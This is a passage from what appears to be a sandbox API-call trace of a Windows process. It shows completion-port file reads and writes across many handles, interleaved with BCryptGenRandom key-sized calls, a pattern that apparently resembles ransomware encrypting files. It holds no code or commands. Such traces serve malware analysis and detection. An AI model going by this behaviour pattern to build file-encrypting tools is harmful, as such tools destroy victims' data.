lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0173.948] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x35b2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.860] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0174.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0174.875] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.875] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.875] free (_Block=0x3e305b8) [0174.875] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.875] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.876] free (_Block=0x1fa91d0) [0174.876] free (_Block=0x1fa2ed8) [0174.876] free (_Block=0x1fa90b8) [0174.876] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0174.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.888] CloseHandle (hObject=0x2a4) returned 1 [0174.888] free (_Block=0x3d70450) [0174.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.906] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x280c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0174.910] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.915] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0174.916] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0174.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.261] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x9350, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.277] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x1950, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0175.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.289] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.303] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3310, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.315] WriteFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0175.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.318] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x828, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0175.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.318] CloseHandle (hObject=0x2a4) returned 1 [0175.318] free (_Block=0x3f70048) [0175.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.325] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8b96, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.326] CloseHandle (hObject=0x338) returned 1 [0175.326] free (_Block=0x3df0008) [0175.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.328] CloseHandle (hObject=0x308) returned 1 [0175.328] free (_Block=0x3ef0008) [0175.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.332] CloseHandle (hObject=0x3cc) returned 1 [0175.332] free (_Block=0x3d70450) [0175.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0175.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0175.395] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.395] free (_Block=0x3e305b8) [0175.395] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.395] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.396] free (_Block=0x1fa91d0) [0175.396] free (_Block=0x1fa2ed8) [0175.396] free (_Block=0x1fa90b8) [0175.396] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.413] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.416] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x878, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0175.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.416] CloseHandle (hObject=0x338) returned 1 [0175.417] free (_Block=0x3d70450) [0175.417] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.419] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x143c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.423] CloseHandle (hObject=0x3cc) returned 1 [0175.423] free (_Block=0x3df0008) [0175.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0175.455] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.455] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.455] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0175.455] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.455] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.455] free (_Block=0x3e305b8) [0175.456] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.456] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.456] free (_Block=0x1fa91d0) [0175.456] free (_Block=0x1fa2ed8) [0175.456] free (_Block=0x1fa90b8) [0175.456] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.457] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.457] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.479] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.504] CloseHandle (hObject=0x338) returned 1 [0175.504] free (_Block=0x3df0008) [0175.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.517] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5b08, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.518] CloseHandle (hObject=0x2a4) returned 1 [0175.518] free (_Block=0x1ff1e60) [0175.518] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.527] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2bb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.528] CloseHandle (hObject=0x338) returned 1 [0175.528] free (_Block=0x3df0008) [0175.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.535] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1e58, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.538] CloseHandle (hObject=0x338) returned 1 [0175.538] free (_Block=0x3df0008) [0175.538] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.559] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaa4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.559] CloseHandle (hObject=0x338) returned 1 [0175.559] free (_Block=0x3df0008) [0175.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.567] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1724, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.568] CloseHandle (hObject=0x2a4) returned 1 [0175.569] free (_Block=0x1ff1e60) [0175.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.584] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2602, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.585] CloseHandle (hObject=0x2a4) returned 1 [0175.585] free (_Block=0x3df0008) [0175.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.592] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6260, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.593] CloseHandle (hObject=0x338) returned 1 [0175.594] free (_Block=0x1ff1e60) [0175.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.615] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9c80, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.619] CloseHandle (hObject=0x338) returned 1 [0175.619] free (_Block=0x3df0008) [0175.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.640] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xfe6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.640] CloseHandle (hObject=0x2a4) returned 1 [0175.640] free (_Block=0x1ff1e60) [0175.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0175.643] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5006, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, 